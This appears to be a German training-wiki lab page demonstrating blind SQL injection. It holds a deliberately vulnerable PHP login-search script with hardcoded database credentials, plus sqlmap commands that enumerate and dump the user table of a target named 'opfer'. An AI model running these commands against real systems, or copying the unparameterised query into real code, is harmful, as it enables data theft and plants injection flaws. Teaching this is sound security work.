SQL Blind Injection Proof of Concept
Zur Navigation springen
Zur Suche springen
- cat blind.html
<!DOCTYPE html>
<html>
<body>
<h2>SQL Injection</h2>
<form method="post" action="sql-blind.php">
<label for="fname">User</label><br>
<input type="text" name="search"><br>
<input type="submit" name="submit">
</form>
<br>
<table border = "1">
<tr>
<td>user</td>
<td>password</td>
</tr>
</body>
</html>
- cat sql-blind.php
<?php
$search=($_POST['search']);
define('DB_SERVER', '127.0.0.1');
define('DB_USERNAME', 'xinux');
define('DB_PASSWORD', 'suxer');
define('DB_NAME', 'verwaltung');
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
mysqli_set_charset($link, "utf8");
if($link === false){
echo(mysqli_connect_error());
die("ERROR: Could not connect. " . mysqli_connect_error());
}
echo $search;
$sql =" SELECT * FROM my_auth WHERE user='$search'";
$result = mysqli_query($link, $sql);
?>
<!DOCTYPE html>
<html>
<body>
<h2>SQL Injection</h2>
<table border = "1">
<tr>
<td>user</td>
<td>password</td>
</tr>
<?php
while ($row = mysqli_fetch_row($result)) {
echo "<tr>";
echo "<td>".$row[0]." </td>";
echo "<td>"."xxx"." </td><br>";
echo "</tr>";
}
?>
- sqlmap -u "http://opfer/scripts/sql-blind.php" --data="search=erwin" --technique=B
- sqlmap -u "http://opfer/scripts/sql-blind.php" --data="search=erwin" --technique=B --tables
- sqlmap -u "http://opfer/scripts/sql-blind.php" --data="search=erwin" -D verwaltung -T my_auth --dump